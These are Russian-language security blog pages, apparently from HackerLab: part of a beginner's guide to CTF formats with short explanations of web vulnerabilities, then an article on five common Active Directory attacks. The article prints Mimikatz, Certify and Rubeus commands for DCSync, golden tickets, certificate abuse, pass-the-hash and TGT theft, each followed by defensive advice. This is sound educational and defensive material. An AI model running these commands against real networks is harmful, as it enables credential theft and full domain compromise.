    выделил всего два вида: Task-based и Attack Defense.</p>

<div data-toc="Task-based" id="task-based"></div>
<h3>Task-based</h3>
<p>С тасками всё относительно просто, условно задаются тематики в рамках которых и будут строиться
    задачки(Реверс-инжиниринг, форензика, OSINT, криптография и т.д). Ранее я разбирал таски OSINT соревнований в
    которых участвовал и как в качестве наглядного примера советую с ними ознакомиться: <a target="_blank"
                                                                                           href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-1-ili-kak-ya-iskal-aeroport-i-gagarina.81120/">часть
        1</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-ili-kak-ya-iskal-model-kamery-prestupnika-chast-2.81121/">часть
        2</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-3-ili-kak-ya-razoblochal-sigaint.81122/">часть
        3</a>.</p>

<p>Такой формат соревнований очень хорош для новичков т.к такие темы как: криптография, реверс-инжиниринг, форензика,
    OSINT и веб-уязвимости встречаются в большинстве такого вида соревнований. И главное чем хороши таски это тем, что
    ваши флаги покорно будут вас ждать и никуда не денуться пока вы не решите задачку.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/tasks_table.png"
     alt="Таблица заданий">

<p>Для того чтобы спланировать участие в этих соревнований, достаточно просто набрать команду, выявить темы в которых
    каждый член команды больше всего разбирается и распределить кто к какой теме будет готовиться. Для подготовки
    требуется лишь практический опыт и софт составляющая.</p>

<div data-toc="Attack Defense" id="attack-defense"></div>
<h3>Attack Defense</h3>
<p>Этот вид соревнований для “настоящих ценителей”, новичкам в таком виде соревнований будет достаточно сложно, но
    безусловно они получат хороший практический опыт в сфере ИБ. Суть соревнований заключается в том, что у каждой
    команды имеется свой сервер и они находятся все в одной сети, будь то виртуальные машины или VPN, в каждом сервисе
    оставлены уязвимости и чаще всего требуется завладеть админкой сервиса, захватить флаг и защитить свои сервисы
    закрытием уязвимостей которые были найдены у других команд.</p>

<p>Сервисы в основном будут запускаться через docker-compose и обязательно нужно иметь навыки запуска сервисов через
    docker. Чаще всего он уже предустановлен на сервере. Для запуска потребуется войти в директорию сервиса,
    ознакомиться с файлом README.md в котором будет описан процесс запуска сервиса, но чаще всего просто потребуется
    прописать docker-compose up.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/docker.png"
     alt="Docker">

<p>Соревнования Attack Defense подразумевают знания эксплуатации веб-уязвимостей, к которым относятся: SQLInjection,
    XSS-уязвимости, CSRF, SSRF, IDOR и LFI. Кратко объясню суть этих уязвимостей:</p>

<ul>
    <li>SQL Injection: злоумышленник внедряет вредоносный SQL-код через входные данные(например формы), чтобы
        манипулировать базой данных.
    </li>
    <li>Межсайтовый скриптинг (XSS): внедрение JavaScript-кода на страницу, который выполняется в браузере жертвы.</li>
    <li>Подделка межсайтовых запросов (CSRF): злоумышленник заставляет авторизированного пользователя выполнить действия
        без его согласия(например перевод средств).
    </li>
    <li>Серверная подделка запросов (SSRF): принуждение сервера к выполнению запросов к внутренним или сторонним
        ресурсам.
    </li>
    <li>Небезопасные прямые ссылки (IDOR): Доступ к данным через подмену идентификаторов в URL (например
        /user?id=123→id=124).
    </li>
    <li>Локальное включение файлов (LFI): Чтение локальных файлов через параметры (например ?file=/etc/passwd).</li>
</ul>

<p>Уязвимости из вышеперечисленных самые распространённые в Attack Defense и подготовку команды нужно ориентировать
    именно на них, но специфика подготовки будет заключаться в навыках защиты и нападения.</p>

<p>Для защиты потребуется изучить уязвимости в плане кодовой составляющей, знать из-за чего возникают эти уязвимости,
    ориентация в логике работы кода и хорошие знания в программировании. Также засчёт изучения кода можно атаковать,
    занимаясь реверс-инжинирингом, или подсказывать пути атаки для атакующих коллег.</p>

<p>Для атаки потребуется практический опыт в эксплуатации веб-уязвимостей и умение их находить. В качестве тренировки
    можно пользоваться различными интернет-ресурсами предназначенными для оттачивания этих навыков, например <a
            target="_blank"
            href="https://hackerlab.pro">HackerLab</a>,
    образами виртуальных машин и подобным. Навыки в программировании будут крайне полезными атакующим для написания
    простых эксплоитов на том же Python, что сможет автоматизировать процесс добычи флагов и сдачи их в жюрейку (систему
    для начисления баллов за флаги).</p>

<p>Одним из самых важных и очевидных моментов является знание формата флага, что организаторы как правило должны
    проговаривать перед началом соревнований. Чаще всего это формат некоего хеша.</p>

<div data-toc="Заключение" id="сonclusion"></div>
<h3>Заключение</h3>
<p>Эти простые советы помогут вам составить чёткий план подготовки к соревнованиям, а исходя из этого плана можно будет
    составить конкретный план действий.</p>
<blockquote>
    <p>Всё, что нужно для старта — уже на HackerLab!</p>
    <p>👉 <a href="https://hackerlab.pro/" target="_blank">Заходи, решай, прокачивайся!</a></p>
</blockquote>
</body>
</html>


Как начать участвовать в CTF-соревнованиях: руководство для новичков

Узнайте о самых распространенных уязвимостях Active Directory, которые эксплуатируют хакеры. Разбор реальных кейсов, практические советы по защите и рекомендации для пентестеров

<!doctype html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании</title>
</head>
<body>
<p>Знаете ли вы, что простая конфигурационная ошибка в Active Directory может стать входным билетом злоумышленника в
    вашу сеть? Такие уязвимости мы видим почти в каждой компании.</p>

<div data-toc="1. Введение" id="introduction"></div>
<h2>Введение</h2>
<p>Active Directory (AD) — ключевая технология, на которой строится инфраструктура корпоративных сетей. Упрощая
    управление аутентификацией и доступами, AD зачастую становится лакомым куском для злоумышленников.</p>

<p>В этом материале мы собрали пять самых распространенных уязвимостей Active Directory, используемых на практике — от
    атак с Golden Ticket до DCSync. Вы узнаете, как они работают, что делают хакеры на следующем шаге и как этого
    избежать.</p>

<div data-toc="2. Golden Ticket" id="golden-ticket"></div>
<h2>1. Золотые билеты (Golden Ticket)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/golden_ticket.png"
     alt="Golden Ticket">

<h3>Как это работает?</h3>
<p>Злоумышленник получает доступ к хэшу пароля учетной записи <b>KRBTGT</b> — системного сервиса, выдающего
    Kerberos-билеты. Используя этот хэш, он создает «золотой билет», дающий полный доступ к домену без проверки
    сервером.</p>

<p><b>Что делает атакующий дальше?</b></p>
<ul>
    <li>Создает учетные записи, невидимые для логов</li>
    <li>Получает доступ к критическим данным</li>
    <li>Использует постоянный доступ к инфраструктуре</li>
    <li>Подделывает билеты с любыми сроками действия, обходя двухфакторную аутентификацию</li>
</ul>

<p><b>Как это выглядит на практике:</b><br>
    В 2023 году банк в Восточной Европе потерял контроль над своей сетью. После компрометации KRBTGT злоумышленники
    мигрировали данные клиентов в течение нескольких дней, оставаясь незаметными.</p>

<h3>Пример:</h3>
<pre><code># Извлекаем хэш KRBTGT с помощью Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'

# Создаем "золотой билет"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:a9b3c... /ticket:golden.kirbi"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Регулярно меняйте пароль учетной записи KRBTGT (2 раза подряд для полной ротации)</li>
    <li>Включите аудит событий <b>4662</b> (доступ к объектам) для раннего выявления проблем.</li>
</ul>

<div data-toc="3. Уязвимости службы сертификатов AD CS" id="ad-cs"></div>
<h2>2. Уязвимости службы сертификатов AD CS</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ad_cs.png"
     alt="AD CS">

<h3>В чем проблема?</h3>
<p>Служба AD CS, используемая для управления цифровыми сертификатами, может содержать уязвимые шаблоны. Эти шаблоны
    позволяют злоумышленнику успешно пройти аутентификацию, получив права администратора через сертификат.</p>

<p><b>Что делает злоумышленник дальше?</b></p>
<ul>
    <li>С помощью полученного сертификата компрометирует сессии через RDP, WinRM или SMB</li>
    <li>Устанавливает бэкдоры в инфраструктуре</li>
    <li>Использует сертификаты для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный кейс:</b><br>
    В 2024 году ритейлер потерял 2,5 ТБ данных клиентов из-за атаки на AD CS. Злоумышленники использовали слабые
    настройки шаблонов для получения администраторских привилегий.</p>

<h3>Эксплуатация:</h3>
<pre><code># Поиск уязвимых шаблонов
Certify.exe find /vulnerable

# Запрос сертификата для доменного админа
Certify.exe request /ca:ca.corp.local\corp-CA /template:VulnerableTemplate /altname:Administrator
</code></pre>

<h3>Меры защиты</h3>
<ul>
    <li>Убедитесь, что шаблоны не используют <b>ENROLLEE_SUPPLIES_SUBJECT</b></li>
    <li>Проверьте права на использование шаблонов и ограничьте доступ к ним</li>
</ul>

<div data-toc="4. Pass-the-Hash (PtH)" id="pth"></div>
<h2>3. Pass-the-Hash (PtH)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/pth.png"
     alt="PtH">

<h3>Как это работает?</h3>
<p>Хэши паролей NTLM, находящиеся в памяти LSASS, позволяют атакующему аутентифицироваться без знания реального
    пароля.</p>

<p><b>Что делает хакер дальше?</b></p>
<ul>
    <li>Распространяется через SMB или SQL-службы на другие машины</li>
    <li>Использует полученные привилегии для внедрения эксплойтов</li>
</ul>

<p><b>Пример атаки из жизни:</b><br>
    На одном из проектов злоумышленник с помощью PtH распространился от обычного пользователя до уровня Domain Admin
    менее чем за час.</p>

<h3>Пример</h3>
<pre><code># Дамп хэшей
sekurlsa::logonpasswords

# Используем хэш для доступа к серверу
sekurlsa::pth /user:Admin /domain:corp.local /ntlm:a9b3c... /run:"cmd.exe"
</code></pre>

<h3>Совет:</h3>
<ul>
    <li>Включите <b>Credential Guard</b> для защиты хэшей в памяти (учтите, что он защищает только локальные
        учетные записи)
    </li>
    <li>Перенастройте корпоративную инфраструктуру так, чтобы исключить использование NTLM или ограничьте его через
        Group Policy.
    </li>
</ul>

<div data-toc="5. DCSync-атаки" id="dcsync"></div>
<h2>4. DCSync-атаки</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/dcsync.png"
     alt="dcsync">

<h3>Что это?</h3>
<p>DCSync-атака позволяет злоумышленнику с правами <b>Replicating Directory Changes</b> выдавать себя за
    контроллер домена и запрашивать хэши паролей пользователей, включая администраторов.</p>

<p><b>Обычно затем атакующий делает следующее:</b></p>
<ul>
    <li>Переходит к созданию Golden Ticket</li>
    <li>Извлекает учетные записи привилегированных пользователей</li>
    <li>Получает полные учетные данные для компрометации сетевой инфраструктуры</li>
</ul>

<p><b>Кейс из практики:</b><br>
    В 2022 году группа киберпреступников проникла в инфраструктуру госучреждения и благодаря DCSync получила полный
    доступ к сети.</p>

<h3>Пример</h3>
<pre><code># Выполняем DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Ограничьте доступ к правам <b>Replicating Directory Changes</b>, <b>Replicating Directory Changes
        All</b> и <b>Replicating Directory Changes In Filtered Set</b></li>
    <li>Ручной аудит списков доступа к AD для ключевых узлов</li>
</ul>

<div data-toc="6. Unconstrained Delegation" id="ud"></div>
<h2>5. Неограниченное делегирование (Unconstrained Delegation)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ud.png"
     alt="ud">

<h3>Почему это опасно?</h3>
<p>Сервисы с <b>Unconstrained Delegation</b> хранят TGT-билеты других пользователей, включая администраторов.
    Если хакер получает доступ к такому серверу, он может использовать эти билеты для выполнения любого действия от
    имени атакуемого пользователя.</p>

<p><b>Следующие шаги:</b></p>
<ul>
    <li>Эскалация привилегий</li>
    <li>Выполнение подложных транзакций в системах, подключенных к атакуемому серверу</li>
    <li>Использование TGT-билетов для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный пример:</b><br>
    Производитель ПО был атакован через SQL-сервер с включенной делегацией. Билеты администраторов использовались для
    подключения к финансовым системам компании.</p>

<h3>Пример</h3>
<pre><code># Поиск серверов с Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Кража TGT через SpoolService
Rubeus.exe monitor /interval:5 /filteruser:SERVER01$
</code></pre>

<h3>Рекомендации:</h3>
<ul>
    <li>Переведите все ресурсы на <b>Constrained Delegation</b></li>
    <li>Отключите делегацию для узлов, где она не требуется</li>
    <li>Проверьте Resource-Based Constrained Delegation (RBCD) и ограничьте ее использование</li>
</ul>

<div data-toc="7. Заключение" id="conclusion"></div>
<h2>Заключение</h2>
<p>Эти уязвимости подчеркивают, как легко атакующий может получить полномасштабный доступ через ошибки в конфигурации
    AD.</p>

<p><b>Ваши шаги:</b></p>
<ol>
    <li>Проверьте наличие описанных проблем в вашей сети.</li>
    <li>Ограничьте доступы и настройте аудит.</li>
    <li>Обучайте специалистов, чтобы держать инфраструктуру под контролем.</li>
</ol>

<h2>Часто задаваемые вопросы</h2>

<p><b>Q: Как часто нужно проверять AD на уязвимости?</b><br>
    A: Минимум раз в квартал + после любых изменений в инфраструктуре.</p>

<p><b>Q: Какие инструменты использовать для проверки?</b><br>
    A: BloodHound, PingCastle, ADRecon.</p>

<p><b>Q: Можно ли полностью защититься от этих атак?</b><br>
    A: 100% защиты нет, но можно снизить риски на 90% через правильную конфигурацию.</p>

<blockquote>
<p>Хотите научиться находить и использовать такие уязвимости в легальных пентестах? <b>29 мая стартует новый поток
    курса по тестированию AD от Codeby.</b></p>
<p>👉 <a href="https://ad.codeby.school/" target="_blank">Забронировать место на курсе</a></p>
</blockquote>
</body>
</html>

Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании

Шесть инструментов, которые мы собрали в статье, — это твой первый боевой набор. Каждый из них открывает тебе глаза на то, как работает веб: что передаётся "за кадром", как устроены формы авторизации, какие ошибки допускают даже крупные компании

Блог

Самые популярные статьи: